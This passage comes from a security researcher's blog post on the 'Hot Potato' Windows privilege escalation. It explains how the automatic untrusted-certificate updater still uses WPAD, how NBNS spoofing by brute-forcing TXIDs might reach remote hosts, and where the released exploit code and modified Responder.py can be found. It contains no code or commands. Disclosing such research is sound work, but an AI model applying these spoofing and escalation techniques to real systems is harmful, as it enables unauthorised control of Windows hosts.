Instead, for these versions, we rely on a newer feature of Windows: the “automatic updater of untrusted certificates”. Details can be found at https://support.microsoft.com/en-us/kb/2677070 and https://technet.microsoft.com/en-us/library/dn265983.aspx
From the technet article “The Windows Server 2012 R2, Windows Server 2012, Windows 8.1, and Windows 8 operating systems include an automatic update mechanism that downloads certificate trust lists (CTLs) on a daily basis.”
It appears that this part of Windows still uses WPAD, even when the winhttp proxy setting is set to direct. Why is a bit of a mystery…
In this case the usage of Potato is as follows:
At this point, you will need to wait up to 24hrs or find another way to trigger this update.
If your network has a DNS entry for “WPAD” already, refer to the documentation for this situation in Server 2008. You can try port exhaustion but it might be tricky.
It’s unclear whether this attack would work when SMB signing is enabled. The exploit as released currently does not, but this may just be due to lack of SMB signing support in the CIFS library we’re using. My reason to suspect that it may work is that everything is happening on 127.0.0.1. If the signatures are host based, they may still match?
Let’s think back to our NBNS spoofing attack.
Using the same technique of brute-forcing the TXID, we could technically perform NBNS spoofing attacks outside of our local network. In fact, in theory, as long as there is a fast enough connection to support it, we should be able to perform NBNS spoofing attacks against ANY Windows hosts for which we can talk to UDP port 137.
This actually appears to work in practice, at least on a local network; I’ve yet to successfully try it over the Internet.
We’re releasing a modified version of the “Responder.py” tool that performs this attack. The following video demonstrates the attack on a network laid out as follows:
Those interested in trying this out themselves or building upon it can find all of the code on our GitHub page: https://github.com/foxglovesec/Potato
Original Post: http://foxglovesecurity.com/2016/01/16/hot-potato/